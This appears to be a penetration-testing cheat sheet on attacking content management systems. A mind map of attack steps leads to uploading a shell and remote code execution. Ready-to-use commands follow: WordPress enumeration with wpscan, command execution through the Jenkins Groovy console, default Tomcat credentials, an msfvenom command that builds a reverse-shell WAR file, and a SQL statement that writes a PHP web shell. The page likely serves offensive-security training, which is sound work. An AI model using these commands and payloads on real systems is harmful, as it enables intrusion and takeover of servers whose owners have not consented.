CMS Attack Workflow
Attacking Content Management Systems
Attacking Common ApplicationsTip: Click on any node to see related information!
Interactive Mind Map
graph TD
A[Identify CMS] --> B[Check Version]
B --> C[Search Exploits]
C --> D{Public Exploit?}
D -->|Yes| E[Run Exploit]
D -->|No| F[Enumerate Plugins]
F --> G[Default Creds]
G --> H[Admin Panel]
H --> I[Upload Shell]
E --> J[RCE]
Quick Reference
WordPress
wpscan --url http://target --enumerate u,p,t # Enumerate WordPress users, plugins, themes
Jenkins
println "whoami".execute().text # Jenkins Groovy Script Console RCE
Tomcat
tomcat/tomcat # Try default credentials msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=4444 -f war > shell.war # Create malicious WAR file
phpMyAdmin
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php' # Write web shell via SQL